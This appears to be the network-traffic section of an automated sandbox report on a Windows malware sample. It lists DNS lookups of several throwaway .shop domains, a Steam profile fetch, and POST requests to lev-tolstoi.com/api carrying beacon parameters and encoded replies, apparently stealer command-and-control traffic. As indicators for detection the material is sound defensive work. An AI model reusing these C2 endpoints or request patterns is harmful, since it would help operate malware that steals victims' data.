                                                                                                                                                                                                                                        Dec 18, 2024 15:17:35.709139109 CET192.168.2.61.1.1.10xc3fdStandard query (0)terracedjz.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:36.052126884 CET192.168.2.61.1.1.10x5d8Standard query (0)worddosofrm.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:36.192610979 CET192.168.2.61.1.1.10xb901Standard query (0)mutterissuen.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:36.424196959 CET192.168.2.61.1.1.10x2b8fStandard query (0)standartedby.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:36.738534927 CET192.168.2.61.1.1.10x155cStandard query (0)nightybinybz.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:36.962635994 CET192.168.2.61.1.1.10x4b06Standard query (0)conceszustyb.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:37.383090019 CET192.168.2.61.1.1.10x33e8Standard query (0)bakedstusteeb.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:37.613349915 CET192.168.2.61.1.1.10x5e5Standard query (0)respectabosiz.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:37.754473925 CET192.168.2.61.1.1.10xa7b5Standard query (0)moutheventushz.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:37.987747908 CET192.168.2.61.1.1.10x2f73Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.666347027 CET192.168.2.61.1.1.10xb231Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:30.642666101 CET1.1.1.1192.168.2.60x5266No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:30.642666101 CET1.1.1.1192.168.2.60x5266No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:32.989937067 CET1.1.1.1192.168.2.60xf2e7No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:32.989937067 CET1.1.1.1192.168.2.60xf2e7No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:35.928087950 CET1.1.1.1192.168.2.60xc3fdName error (3)terracedjz.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:36.191143990 CET1.1.1.1192.168.2.60x5d8Name error (3)worddosofrm.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:36.413052082 CET1.1.1.1192.168.2.60xb901Name error (3)mutterissuen.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:36.645276070 CET1.1.1.1192.168.2.60x2b8fName error (3)standartedby.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:36.878353119 CET1.1.1.1192.168.2.60x155cName error (3)nightybinybz.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:37.100126028 CET1.1.1.1192.168.2.60x4b06Name error (3)conceszustyb.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:37.609543085 CET1.1.1.1192.168.2.60x33e8Name error (3)bakedstusteeb.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:37.751405001 CET1.1.1.1192.168.2.60x5e5Name error (3)respectabosiz.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:37.984594107 CET1.1.1.1192.168.2.60xa7b5Name error (3)moutheventushz.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:38.125514030 CET1.1.1.1192.168.2.60x2f73No error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.888818979 CET1.1.1.1192.168.2.60xb231No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.888818979 CET1.1.1.1192.168.2.60xb231No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                                        • steamcommunity.com
                                                                                                                                                                                                                                        • lev-tolstoi.com

                                                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        0192.168.2.64971523.55.153.1064434176C:\Users\user\Desktop\ji2xlo1f.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-18 14:17:40 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: steamcommunity.com
                                                                                                                                                                                                                                        2024-12-18 14:17:41 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Date: Wed, 18 Dec 2024 14:17:40 GMT
                                                                                                                                                                                                                                        Content-Length: 35121
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Set-Cookie: sessionid=ab3f6d7c3e458d2fd2dcae42; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                        Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                        2024-12-18 14:17:41 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                        2024-12-18 14:17:41 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                        Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                        2024-12-18 14:17:41 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                        Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        1192.168.2.649724104.21.66.864434176C:\Users\user\Desktop\ji2xlo1f.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-18 14:17:43 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                        2024-12-18 14:17:43 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                                                                                                        2024-12-18 14:17:45 UTC1033INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Wed, 18 Dec 2024 14:17:45 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=a5tj6vlj6ap2std8ulnnao732m; expires=Sun, 13-Apr-2025 08:04:22 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QeCG9SH6xJjjpT9OxArZcQril4G9R9btnnKF7cgmKLebGasXH8UPAs38ubEfoGUtiBqyB90fL2gcO6EmVXFH%2FhLH%2Bb0hGO8dHTYt7b1x97XtBCfkxpRwz2PvYW7oe6aylyU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                        CF-RAY: 8f3fc72e29077ce2-EWR
                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1783&rtt_var=687&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=906&delivery_rate=1573275&cwnd=236&unsent_bytes=0&cid=2c80b653ff152f53&ts=2357&x=0"
                                                                                                                                                                                                                                        2024-12-18 14:17:45 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 2ok
                                                                                                                                                                                                                                        2024-12-18 14:17:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        2192.168.2.649739104.21.66.864434176C:\Users\user\Desktop\ji2xlo1f.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-18 14:17:46 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Content-Length: 50
                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                        2024-12-18 14:17:46 UTC50OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 6e 6f 76 65 6d 62 65 72 26 6a 3d
                                                                                                                                                                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=FATE99--november&j=
                                                                                                                                                                                                                                        2024-12-18 14:17:47 UTC1039INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Wed, 18 Dec 2024 14:17:47 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=k8v9rs6s5ku9rrocavj1j879m9; expires=Sun, 13-Apr-2025 08:04:26 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ItKdity3DCxuXjNBHpnc2CECt9%2BYUAKzfqEWHwa662RDpqaIfTPCQCIsSWqC08Kzb%2FfABPoIcihnfihSTKjzi%2BzxF%2BiKtvW%2F6RBs39GAgNuq9v97vcC2dovTiwnlIpS2mSI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                        CF-RAY: 8f3fc7453b827d08-EWR
                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1826&min_rtt=1821&rtt_var=693&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=949&delivery_rate=1568206&cwnd=177&unsent_bytes=0&cid=092916f7fad4cb70&ts=1200&x=0"
                                                                                                                                                                                                                                        2024-12-18 14:17:47 UTC330INData Raw: 31 64 32 61 0d 0a 66 45 66 4e 64 50 4c 37 4d 35 31 7a 76 4e 37 4c 79 4c 44 30 54 76 63 67 49 6f 37 52 53 34 74 7a 62 44 2b 42 31 31 6d 66 54 74 51 48 5a 62 74 57 79 4d 38 66 76 77 44 5a 2f 50 47 38 77 6f 45 72 32 77 4a 44 36 76 4e 78 37 52 49 41 54 4f 54 37 65 2b 6b 6a 39 6b 59 68 72 42 69 42 6e 68 2b 2f 46 73 54 38 38 5a 50 4c 31 69 75 5a 41 68 69 73 74 43 48 70 45 67 42 64 34 4c 77 32 37 79 4b 33 46 43 75 71 48 4a 65 59 56 2f 77 66 30 62 75 75 72 64 47 65 49 4a 35 4e 53 75 50 7a 5a 36 6b 57 46 68 32 37 39 52 54 36 4f 72 55 78 4a 72 34 66 30 49 59 66 35 6c 48 5a 73 4f 6e 79 6b 70 55 72 6c 55 78 45 36 72 6f 6a 34 78 73 49 58 4f 57 39 4b 66 59 6f 76 42 51 6c 71 52 32 64 6b 55 50 78 46 64 61 77 71 4b 66 52 31 6d 4c 56 52 56 69 73 36 32 6d 36 49 77 31 4d 38
                                                                                                                                                                                                                                        Data Ascii: 1d2afEfNdPL7M51zvN7LyLD0TvcgIo7RS4tzbD+B11mfTtQHZbtWyM8fvwDZ/PG8woEr2wJD6vNx7RIATOT7e+kj9kYhrBiBnh+/FsT88ZPL1iuZAhistCHpEgBd4Lw27yK3FCuqHJeYV/wf0buurdGeIJ5NSuPzZ6kWFh279RT6OrUxJr4f0IYf5lHZsOnykpUrlUxE6roj4xsIXOW9KfYovBQlqR2dkUPxFdawqKfR1mLVRVis62m6Iw1M8
                                                                                                                                                                                                                                        2024-12-18 14:17:47 UTC1369INData Raw: 37 37 41 39 35 41 42 4f 51 71 32 73 65 2f 6f 67 39 6b 5a 6c 71 52 69 52 6c 46 48 74 47 64 57 33 72 4c 6a 5a 6e 79 47 59 51 6b 33 6d 76 43 72 70 46 67 52 58 37 4c 38 2f 38 43 47 77 48 69 58 76 57 4e 43 65 53 62 39 4a 6e 70 2b 73 75 74 57 61 4f 74 64 34 41 50 50 39 4d 4b 6b 57 41 68 32 37 39 54 50 34 4c 37 55 56 4b 71 77 65 6d 34 74 52 37 52 66 54 75 62 75 73 31 35 67 6d 6c 6c 42 4b 34 72 55 71 34 42 6f 48 57 4f 53 78 65 37 4e 73 73 51 5a 6c 39 31 61 78 6c 46 72 7a 47 38 6d 38 36 62 57 63 6a 32 79 53 54 67 43 30 38 79 33 6f 46 51 39 5a 37 62 73 2f 38 53 71 34 45 79 71 70 48 4a 43 65 57 2f 63 5a 33 37 47 69 70 64 4b 54 49 5a 46 45 54 4f 32 32 61 61 64 52 43 55 57 6a 37 58 76 54 4b 37 55 4d 5a 35 6f 56 6e 70 64 57 36 56 48 42 38 72 44 71 31 5a 70 73 7a 51 4a
                                                                                                                                                                                                                                        Data Ascii: 77A95ABOQq2se/og9kZlqRiRlFHtGdW3rLjZnyGYQk3mvCrpFgRX7L8/8CGwHiXvWNCeSb9Jnp+sutWaOtd4APP9MKkWAh279TP4L7UVKqwem4tR7RfTubus15gmllBK4rUq4BoHWOSxe7NssQZl91axlFrzG8m86bWcj2ySTgC08y3oFQ9Z7bs/8Sq4EyqpHJCeW/cZ37GipdKTIZFETO22aadRCUWj7XvTK7UMZ5oVnpdW6VHB8rDq1ZpszQJ
                                                                                                                                                                                                                                        2024-12-18 14:17:47 UTC1369INData Raw: 36 6c 66 54 6c 72 37 39 57 4f 39 48 61 45 56 5a 35 6f 56 6e 70 64 57 36 56 48 42 38 72 44 71 31 5a 70 73 7a 51 4a 4e 35 4c 59 73 35 68 41 45 55 2b 61 2f 4e 2f 55 69 74 51 77 71 71 78 61 63 6b 56 76 79 48 39 71 30 6f 4b 48 5a 6b 43 79 55 53 41 43 69 38 79 37 78 55 56 59 64 31 37 49 33 38 43 50 30 4b 79 61 68 47 4a 65 50 45 65 42 66 78 2f 79 75 70 70 4c 4f 62 4a 6c 4c 51 4f 65 35 4c 65 6b 57 41 31 6a 67 73 6a 6a 77 4b 37 77 51 49 71 73 61 6d 5a 52 58 2f 78 62 61 75 62 75 76 32 35 6f 67 31 51 77 41 36 36 74 70 73 56 45 68 57 76 57 32 46 50 34 39 76 31 34 36 34 51 2f 51 6e 6c 32 2f 53 5a 36 37 72 4b 4c 5a 6b 43 53 56 55 45 58 69 75 43 6a 6a 46 77 39 51 37 37 4d 37 2f 43 79 77 45 69 57 6f 45 59 4b 4c 56 50 6b 44 31 50 7a 6e 36 74 57 4f 62 4d 30 43 64 76 79 6b
                                                                                                                                                                                                                                        Data Ascii: 6lfTlr79WO9HaEVZ5oVnpdW6VHB8rDq1ZpszQJN5LYs5hAEU+a/N/UitQwqqxackVvyH9q0oKHZkCyUSACi8y7xUVYd17I38CP0KyahGJePEeBfx/yuppLObJlLQOe5LekWA1jgsjjwK7wQIqsamZRX/xbaubuv25og1QwA66tpsVEhWvW2FP49v1464Q/Qnl2/SZ67rKLZkCSVUEXiuCjjFw9Q77M7/CywEiWoEYKLVPkD1Pzn6tWObM0Cdvyk
                                                                                                                                                                                                                                        2024-12-18 14:17:47 UTC1369INData Raw: 46 55 37 4c 30 7a 38 69 4f 79 45 43 4f 70 47 35 57 57 57 2b 30 5a 30 4c 47 69 70 64 6d 45 4c 4a 68 47 54 4f 69 37 49 75 4e 52 51 42 33 6b 72 58 75 6c 62 49 4d 54 4b 71 38 56 68 74 6c 4f 73 51 69 65 75 36 58 71 69 74 59 67 6d 30 4a 50 34 4c 38 69 34 52 41 43 55 2b 53 77 4d 76 55 6b 70 42 38 68 70 78 65 65 6c 6c 44 37 46 4e 75 34 72 71 37 55 6d 57 7a 62 41 6b 66 30 38 33 47 70 50 69 6c 6f 6f 5a 51 42 76 54 50 34 42 32 57 6f 47 74 44 42 45 66 4d 53 30 72 53 6d 72 4e 75 61 4a 70 78 4a 54 4f 65 33 4a 65 41 55 43 46 7a 6d 73 44 72 35 49 4c 77 59 4a 71 77 5a 6e 35 5a 5a 76 31 2b 65 75 37 48 71 69 74 59 4a 67 6b 6c 4f 36 76 4d 32 70 77 68 4f 57 75 2f 31 59 37 30 67 76 78 67 6a 71 68 71 52 6e 31 6e 36 47 64 71 39 72 36 7a 52 6d 53 69 51 51 30 2f 6f 76 79 66 6a 45
                                                                                                                                                                                                                                        Data Ascii: FU7L0z8iOyECOpG5WWW+0Z0LGipdmELJhGTOi7IuNRQB3krXulbIMTKq8VhtlOsQieu6XqitYgm0JP4L8i4RACU+SwMvUkpB8hpxeellD7FNu4rq7UmWzbAkf083GpPilooZQBvTP4B2WoGtDBEfMS0rSmrNuaJpxJTOe3JeAUCFzmsDr5ILwYJqwZn5ZZv1+eu7HqitYJgklO6vM2pwhOWu/1Y70gvxgjqhqRn1n6Gdq9r6zRmSiQQ0/ovyfjE
                                                                                                                                                                                                                                        2024-12-18 14:17:47 UTC1369INData Raw: 2b 4b 66 6f 6a 73 68 6b 70 71 52 6d 57 6d 46 54 31 48 64 6d 35 6f 71 58 65 31 6d 4c 56 52 56 69 73 36 32 6e 48 47 68 31 4b 34 4c 73 77 36 7a 66 32 41 57 75 32 56 70 65 56 45 61 64 52 33 62 65 69 72 74 4b 61 4c 4a 46 50 51 50 36 38 4c 75 34 59 42 55 2f 70 73 6a 7a 32 4a 4c 30 52 49 37 30 61 6e 6f 74 55 37 51 4f 65 38 75 6d 74 79 74 5a 30 31 58 52 48 2f 4b 4d 71 71 79 41 59 58 76 57 2b 4e 76 46 73 71 56 41 38 37 78 47 63 32 51 6d 2f 46 39 47 31 71 71 58 54 6e 79 43 59 52 30 6e 70 73 69 2f 74 47 77 52 64 35 62 4d 36 2b 43 61 31 48 79 2b 6d 45 5a 69 65 55 75 31 52 6b 50 79 75 73 70 4c 4f 62 4c 78 46 55 75 4b 6a 61 66 5a 66 46 78 33 6b 75 58 75 6c 62 4c 49 55 4b 71 73 52 6e 4a 39 55 2b 52 7a 66 73 36 69 71 33 5a 49 6e 6e 45 52 42 34 62 59 6b 37 51 4d 45 56 75
                                                                                                                                                                                                                                        Data Ascii: +KfojshkpqRmWmFT1Hdm5oqXe1mLVRVis62nHGh1K4Lsw6zf2AWu2VpeVEadR3beirtKaLJFPQP68Lu4YBU/psjz2JL0RI70anotU7QOe8umtytZ01XRH/KMqqyAYXvW+NvFsqVA87xGc2Qm/F9G1qqXTnyCYR0npsi/tGwRd5bM6+Ca1Hy+mEZieUu1RkPyuspLObLxFUuKjafZfFx3kuXulbLIUKqsRnJ9U+Rzfs6iq3ZInnERB4bYk7QMEVu
                                                                                                                                                                                                                                        2024-12-18 14:17:47 UTC1369INData Raw: 4c 4c 77 62 4c 36 49 56 6e 35 70 44 2f 68 66 4d 76 4b 53 67 77 4a 77 6e 6b 45 39 4e 34 62 41 76 37 78 6f 43 54 2b 71 31 4f 50 5a 73 2b 46 34 69 74 31 62 49 32 58 4c 6f 42 39 53 37 70 62 7a 5a 6c 79 2b 44 54 31 43 73 2f 57 6e 34 46 68 38 64 75 36 4d 72 36 69 75 70 55 44 7a 76 45 5a 7a 5a 43 62 38 58 31 37 71 75 72 4e 79 45 4b 5a 4e 4e 54 2b 57 36 4c 65 45 53 44 6c 6e 6e 73 6a 37 2b 49 4c 30 5a 4a 71 41 53 6d 5a 64 59 38 46 47 51 2f 4b 36 79 6b 73 35 73 74 46 6c 44 34 4c 35 70 39 6c 38 58 48 65 53 35 65 36 56 73 75 68 41 67 72 78 79 57 6e 56 54 35 47 39 75 38 6f 71 6e 64 6b 69 71 52 54 55 44 6e 75 69 6a 76 46 41 52 57 35 62 67 34 2b 79 72 32 55 47 57 6f 44 74 44 42 45 64 38 4b 30 37 43 75 36 73 33 59 4e 64 56 46 54 4b 7a 72 61 65 49 64 43 6c 72 6a 75 44 6a
                                                                                                                                                                                                                                        Data Ascii: LLwbL6IVn5pD/hfMvKSgwJwnkE9N4bAv7xoCT+q1OPZs+F4it1bI2XLoB9S7pbzZly+DT1Cs/Wn4Fh8du6Mr6iupUDzvEZzZCb8X17qurNyEKZNNT+W6LeESDlnnsj7+IL0ZJqASmZdY8FGQ/K6yks5stFlD4L5p9l8XHeS5e6VsuhAgrxyWnVT5G9u8oqndkiqRTUDnuijvFARW5bg4+yr2UGWoDtDBEd8K07Cu6s3YNdVFTKzraeIdClrjuDj
